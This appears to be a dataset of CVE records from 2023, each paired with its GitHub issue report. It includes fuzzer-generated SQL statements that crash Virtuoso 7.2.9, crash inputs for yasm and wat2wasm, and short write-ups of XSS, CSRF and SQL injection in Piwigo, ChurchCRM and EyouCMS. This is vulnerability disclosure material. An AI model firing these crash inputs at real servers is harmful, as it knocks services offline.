[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1135" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1135
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL DELETE FROM ucview WHERE CURRENT OF c1; ``` backtrace: ```c #0 0x7d8904 (sqlc_make_policy_trig+0x54) #1 0x7ddf99 (sqlc_delete_pos+0x2e9) #2 0x6b6e53 (sql_stmt_comp+0x453) #3 0x6ba122 (sql_compile_1+0x1a62) #4 0x7c8cd0 (stmt_set_query+0x340) #5 0x7cabc2 (sf_sql_e...
virtuoso 7.2.9 crashed at sqlc_make_policy_trig
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1135/comments
0
2023-04-12T19:32:30Z
2023-04-14T08:12:14Z
https://github.com/openlink/virtuoso-opensource/issues/1135
1,665,127,014
1,135
CVE-2023-31623
2023-05-15T15:15:12.390
An issue in the mp_box_copy component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1131" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1131
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1( x INTEGER PRIMARY KEY, k VARCHAR ); CREATE VIEW t1 AS SELECT k, k FROM t1; UPDATE t1 SET k = k-1 WHERE k > 100 AND x = 128; ``` backtrace: ```c #0 0xe086e9 (mp_box_copy+0x9) #1 0xe08dd0 (mp_box_copy_tree+0xc0) #2 0x815b3a (sqlc_col_t...
virtuoso 7.2.9 crashed at mp_box_copy
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1131/comments
1
2023-04-12T19:21:09Z
2023-04-14T08:41:41Z
https://github.com/openlink/virtuoso-opensource/issues/1131
1,665,114,015
1,131
CVE-2023-31624
2023-05-15T15:15:12.437
An issue in the sinv_check_exp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1134" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1134
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE base_tbl (a int, b int); CREATE VIEW rw_view1 AS SELECT * FROM base_tbl; INSERT INTO rw_view1 VALUES (15); ``` backtrace: ```c #0 0x788dc0 (sinv_check_exp+0x120) #1 0x78a03d (sinv_sqlo_check_col_val+0xad) #2 0x816d50 (sqlc_insert_view+0x330) #3 0x6b...
virtuoso 7.2.9 crashed at sinv_check_exp
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1134/comments
0
2023-04-12T19:29:32Z
2023-04-14T08:12:14Z
https://github.com/openlink/virtuoso-opensource/issues/1134
1,665,123,657
1,134
CVE-2023-31625
2023-05-15T15:15:12.487
An issue in the psiginfo component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1132" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1132
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 ( x LONG VARCHAR, a INTEGER DEFAULT 0, b LONG VARCHAR, t2 LONG VARCHAR ); CREATE VIEW t1 AS SELECT * FROM t1; INSERT INTO t1(t2, x, x) VALUES('one-toasted,one-null', '', repeat('1234567890',50000)); ``` backtrace: ```c #0 0x7f42...
virtuoso 7.2.9 crashed at psiginfo (maybe the same as #1118)
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1132/comments
1
2023-04-12T19:23:55Z
2023-04-14T08:20:16Z
https://github.com/openlink/virtuoso-opensource/issues/1132
1,665,117,118
1,132
CVE-2023-31626
2023-05-15T15:15:12.540
An issue in the gpf_notice component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1129" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1129
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
**This crash seems can only be reproduced when compiling virtuoso with --with-debug.** **When using the docker container, the SQL statement will strangely make the client shell STUCK, but will not crash the server.** The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t4 ( a VARCHAR, b VARCHAR ); ...
virtuoso 7.2.9 crashed at gpf_notice
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1129/comments
0
2023-04-12T19:16:37Z
2023-04-14T08:12:13Z
https://github.com/openlink/virtuoso-opensource/issues/1129
1,665,108,794
1,129
CVE-2023-31627
2023-05-15T15:15:12.587
An issue in the strhash component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1140" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1140
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 ( a varchar(255) DEFAULT NULL ); SELECT * FROM t1 WHERE CONTAINS(*, 'tutorial & (mysql & -VÐƷWİ)'); ``` backtrace: ```c #0 0xdece40 (strhash+0x20) #1 0xdec783 (id_hash_get+0x33) #2 0x59c5d1 (tb_name_to_column+0x41) #3 0x76aed1 (ot_is_defd+0x21...
virtuoso 7.2.9 crashed at strhash
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1140/comments
0
2023-04-12T19:41:37Z
2023-04-14T08:12:17Z
https://github.com/openlink/virtuoso-opensource/issues/1140
1,665,138,910
1,140
CVE-2023-31628
2023-05-15T15:15:12.633
An issue in the stricmp component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1141" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1141
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE t1 ( x VARCHAR, k VARCHAR ); CREATE VIEW t1 AS SELECT x, k FROM t1; INSERT INTO t1 VALUES ('x', 'y'); ``` backtrace: ```c #0 0xeff7b6 (stricmp+0x6) #1 0x607569 (strihashcmp+0x29) #2 0xdec7af (id_hash_get+0x5f) #3 0x607e58 (sch_name_to_object_...
virtuoso 7.2.9 crashed at stricmp (maybe the same as #1118)
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1141/comments
1
2023-04-12T19:43:47Z
2023-04-14T08:19:06Z
https://github.com/openlink/virtuoso-opensource/issues/1141
1,665,143,521
1,141
CVE-2023-31629
2023-05-15T15:15:12.677
An issue in the sqlo_union_scope component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1139" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1139
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL SELECT CASE WHEN EXISTS ( SELECT 1 FROM t2 WHERE x=1 INTERSECT SELECT 1 FROM t2 WHERE y=2 ) THEN 1 ELSE 0 END; ``` backtrace: ```c #0 0x76cd17 (sqlo_union_scope+0x67) #1 0x76cd10 (sqlo_union_scope+0x60) #2 0x76cd10 (sqlo_union_scope+0x60) #3 0x76dc84 ...
virtuoso 7.2.9 crashed at sqlo_union_scope
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1139/comments
0
2023-04-12T19:40:20Z
2023-04-14T08:12:16Z
https://github.com/openlink/virtuoso-opensource/issues/1139
1,665,136,195
1,139
CVE-2023-31630
2023-05-15T15:15:12.723
An issue in the sqlo_query_spec component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1138" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1138
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE TABLE mvtest_pdt1 AS (SELECT 1 AS col1) WITH DATA; ``` backtrace: ```c #0 0x70d571 (sqlo_query_spec+0x41) #1 0x7da2d4 (sqlc_insert+0x13b4) #2 0x6b7387 (sql_stmt_comp+0x987) #3 0x6ba122 (sql_compile_1+0x1a62) #4 0x68276d (bif_exec+0x67d) #5 0x74b044 (ins_c...
virtuoso 7.2.9 crashed at sqlo_query_spec
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1138/comments
0
2023-04-12T19:38:44Z
2023-04-14T08:12:16Z
https://github.com/openlink/virtuoso-opensource/issues/1138
1,665,134,343
1,138
CVE-2023-31631
2023-05-15T15:15:12.777
An issue in the sqlo_preds_contradiction component of openlink virtuoso-opensource v7.2.9 allows attackers to cause a Denial of Service (DoS) via crafted SQL statements.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 7.5, "baseSeverity": "HIGH", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/openlink/virtuoso-opensource/issues/1137" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:openlinksw:virtuoso:7.2.9:*:*:*:open_source:*:*:*", "matchCriteriaId": "75FD7F91-D201-4286-8F97-D2D1C7C9D4C3", "versionEndExcluding": null, "versionEndIncluding": null, "vers...
[ "89" ]
89
https://github.com/openlink/virtuoso-opensource/issues/1137
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "openlink", "virtuoso-opensource" ]
The PoC is generated by my DBMS fuzzer. ```SQL CREATE VIEW t1(a) AS SELECT 1; SELECT a, a, a FROM t1 WHERE a IN (1,5) AND a IN (9,8,3025,1000,3969) ORDER BY a, a DESC; ``` backtrace: ```c #0 0x6f6462 (sqlo_preds_contradiction+0x442) #1 0x6fec43 (sqlo_place_table+0xe23) #2 0x706bab (sqlo_try+0xdb) #3 0...
virtuoso 7.2.9 crashed at sqlo_preds_contradiction
https://api.github.com/repos/openlink/virtuoso-opensource/issues/1137/comments
0
2023-04-12T19:36:18Z
2023-04-14T08:12:15Z
https://github.com/openlink/virtuoso-opensource/issues/1137
1,665,131,513
1,137
CVE-2023-31699
2023-05-17T13:15:09.517
ChurchCRM v4.5.4 is vulnerable to Reflected Cross-Site Scripting (XSS) via image file.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.8, "baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "integ...
[ { "source": "cve@mitre.org", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ChurchCRM/CRM/issues/6471" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://github.com/ChurchCRM/CRM/issues/6471" } ...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:churchcrm:churchcrm:4.5.4:*:*:*:*:*:*:*", "matchCriteriaId": "B55D7EE2-CEB8-45EC-A48C-C0A8B90E4E53", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartEx...
[ "79" ]
79
https://github.com/ChurchCRM/CRM/issues/6471
[ "Third Party Advisory" ]
github.com
[ "ChurchCRM", "CRM" ]
**If you have the ChurchCRM software running, please file an issue using the _Report an issue_ in the help menu.** #### On what page in the application did you find this issue? I got issue CSVImport.php page. #### On what type of server is this running? Dedicated / Shared hosting? Linux / Windows? Windows Ser...
XSS via Image File
https://api.github.com/repos/ChurchCRM/CRM/issues/6471/comments
4
2023-04-16T18:04:50Z
2024-05-27T02:46:17Z
https://github.com/ChurchCRM/CRM/issues/6471
1,670,071,780
6,471
CVE-2023-31725
2023-05-17T15:15:08.957
yasm 1.3.0.55.g101bc was discovered to contain a heap-use-after-free via the function expand_mmac_params at yasm/modules/preprocs/nasm/nasm-pp.c.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://github.com/DaisyPo/fuzzing-vulncollect/tree/main/yasm/heap-use-after-free/nasm-pp.c:3878%20in%20expand_mmac_params" }, { "source": "cve@mitre.org", "tags": [ "Exploit", "Is...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:yasm_project:yasm:1.3.0.55.g101bc:*:*:*:*:*:*:*", "matchCriteriaId": "4A03B4FD-736D-40B7-87B0-AC4EF2660C4B", "versionEndExcluding": null, "versionEndIncluding": null, "versio...
[ "416" ]
416
https://github.com/yasm/yasm/issues/221
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "yasm", "yasm" ]
# There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params ## asan info: ``` ==708699==ERROR: AddressSanitizer: heap-use-after-free on address 0x60e0000012a8 at pc 0x55647c385147 bp 0x7ffe09f5d870 sp 0x7ffe09f5d860 READ of size 8 at 0x60e0000012a8 thread T0 #0 0x556...
There exists heap-use-after-free in yasm/modules/preprocs/nasm/nasm-pp.c:3878 in expand_mmac_params
https://api.github.com/repos/yasm/yasm/issues/221/comments
1
2023-04-17T16:39:42Z
2024-03-22T11:51:42Z
https://github.com/yasm/yasm/issues/221
1,671,576,475
221
CVE-2023-27233
2023-05-17T20:15:09.933
Piwigo before 13.6.0 was discovered to contain a SQL injection vulnerability via the order[0][dir] parameter at user_list_backend.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Third Party Advisory" ], "url": "https://gist.github.com/renanavs/dcb13bb1cd618ce7eb0c80290b837245" }, { "source": "cve@mitre.org", "tags": [ "Release Notes" ], "url": "https://github.com/Piwigo/Piwigo/issues/18...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:*:*:*:*:*:*:*:*", "matchCriteriaId": "86097A18-F13B-45AC-B24B-5A879C3A2DE2", "versionEndExcluding": "13.6.0", "versionEndIncluding": null, "versionStartExcludin...
[ "89" ]
89
https://github.com/Piwigo/Piwigo/issues/1872
[ "Release Notes" ]
github.com
[ "Piwigo", "Piwigo" ]
Without entering too much into details there is a possible SQL injection in file `admin/user_list_backend.php`. This file has no reason to be still in Piwigo since version 12 and the new user manager (which relies on `ws.php` as backend). This file must simply be removed.
[13.x] SQL injection on user_list_backend.php
https://api.github.com/repos/Piwigo/Piwigo/issues/1872/comments
0
2023-02-24T08:42:01Z
2023-02-24T08:42:44Z
https://github.com/Piwigo/Piwigo/issues/1872
1,598,184,264
1,872
CVE-2023-31708
2023-05-23T01:15:09.960
A Cross-Site Request Forgery (CSRF) in EyouCMS v1.6.2 allows attackers to execute arbitrary commands via a supplying a crafted HTML file to the Upload software format function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/weng-xianhu/eyoucms/issues/41" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/weng-...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:eyoucms:eyoucms:1.6.2:*:*:*:*:*:*:*", "matchCriteriaId": "5B87F220-D05C-4885-8C0E-E5BD8D8DFB66", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExclud...
[ "352" ]
352
https://github.com/weng-xianhu/eyoucms/issues/41
[ "Exploit", "Issue Tracking" ]
github.com
[ "weng-xianhu", "eyoucms" ]
let's see the operation: First,we should add the js and html in "Upload software format" . Second,we clicked the submit,and use Burp suite to Intercept the packet. <img width="1251" alt="屏幕截图 2023-04-16 170400" src="https://user-images.githubusercontent.com/60973265/232288495-074b92f6-7789-4a20-879d-ef7fd31a3a08.p...
Three csrf vulnerabilities, you can modify Settings, you can delete articles, you can delete users
https://api.github.com/repos/weng-xianhu/eyoucms/issues/41/comments
0
2023-04-16T10:54:52Z
2024-03-22T06:50:30Z
https://github.com/weng-xianhu/eyoucms/issues/41
1,669,861,738
41
CVE-2023-31669
2023-05-23T12:15:09.173
WebAssembly wat2wasm v1.0.32 allows attackers to cause a libc++abi.dylib crash by putting '@' before a quote (").
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integr...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Third Party Advisory" ], "url": "https://github.com/WebAssembly/wabt/issues/2165" }, { "source": "cve@mitre.org", "tags": null, "url": "https://lists.fedoraproject.org/archives/list/package-announc...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:webassembly:webassembly_binary_toolkit:1.0.32:*:*:*:*:*:*:*", "matchCriteriaId": "AFE1D9C5-6B44-494E-9964-8B5A1374C154", "versionEndExcluding": null, "versionEndIncluding": null, ...
[ "116" ]
116
https://github.com/WebAssembly/wabt/issues/2165
[ "Exploit", "Issue Tracking", "Third Party Advisory" ]
github.com
[ "WebAssembly", "wabt" ]
### Describe the bug '@' before a quote (") causes a libc++abi.dylib crash while converting ".wat" format into ".wasm" format using wat2wasm. `wat2wasm --version`: 1.0.32 (git~1.0.32-35-g9990b0cf) --------------- The following minimized code causes wat2wasm to crash. ``` (module (memory $mem 1) ;;(@...
'@' before a quote (") causes a libc++abi.dylib crash using wat2wasm.
https://api.github.com/repos/WebAssembly/wabt/issues/2165/comments
2
2023-03-09T23:07:30Z
2023-06-17T09:47:53Z
https://github.com/WebAssembly/wabt/issues/2165
1,618,118,032
2,165
CVE-2023-33359
2023-05-23T14:15:09.813
Piwigo 13.6.0 is vulnerable to Cross Site Request Forgery (CSRF) in the "add tags" function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 4.3, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "inte...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Piwigo/Piwigo/issues/1908" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking" ], "url": "https://github.com/Piwigo/Pi...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:*:*:*:*:*:*:*", "matchCriteriaId": "B279DE47-F1F5-4BB9-A47B-1C9B73DD9076", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "352" ]
352
https://github.com/Piwigo/Piwigo/issues/1908
[ "Exploit", "Issue Tracking" ]
github.com
[ "Piwigo", "Piwigo" ]
This vulnerability lies in the 'add tags' function in the backend. ![image](https://user-images.githubusercontent.com/27283436/235408051-ac0c44e8-32e0-4912-a260-83f0b8891db2.png) Try creating a new label here. ![image](https://user-images.githubusercontent.com/27283436/235408127-ba083289-7885-4be2-8ce4-942db7401af...
There is a CSRF vulnerability in the "add tags" function of piwigo
https://api.github.com/repos/Piwigo/Piwigo/issues/1908/comments
3
2023-05-01T04:58:37Z
2023-05-05T08:07:10Z
https://github.com/Piwigo/Piwigo/issues/1908
1,690,372,075
1,908
CVE-2023-33361
2023-05-23T14:15:09.863
Piwigo 13.6.0 is vulnerable to SQL Injection via /admin/permalinks.php.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/Piwigo/Piwigo/issues/1910" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url":...
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:piwigo:piwigo:13.6.0:-:*:*:*:*:*:*", "matchCriteriaId": "C0F29243-1953-4593-9D93-65BAF0D5D0EB", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcludi...
[ "89" ]
89
https://github.com/Piwigo/Piwigo/issues/1910
[ "Exploit", "Issue Tracking", "Patch" ]
github.com
[ "Piwigo", "Piwigo" ]
Before replicating this vulnerability, you need to first create a new album and access the "photos_add" function, and choose to create a new album ![image](https://user-images.githubusercontent.com/27283436/235838268-ab39be83-c3da-446c-bb35-714a9dfd6c7d.png) //like this ![image](https://user-images.githubusercontent...
There is a SQL Injection in the "permalinks" function of piwigo
https://api.github.com/repos/Piwigo/Piwigo/issues/1910/comments
0
2023-05-03T06:02:27Z
2023-05-05T08:24:43Z
https://github.com/Piwigo/Piwigo/issues/1910
1,693,458,747
1,910
CVE-2023-33362
2023-05-23T14:15:09.917
Piwigo 13.6.0 is vulnerable to SQL Injection via in the "profile" function.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 9.8, "baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "in...
[ { "source": "cve@mitre.org", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url": "https://github.com/Piwigo/Piwigo/issues/1911" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Issue Tracking", "Patch" ], "url":...
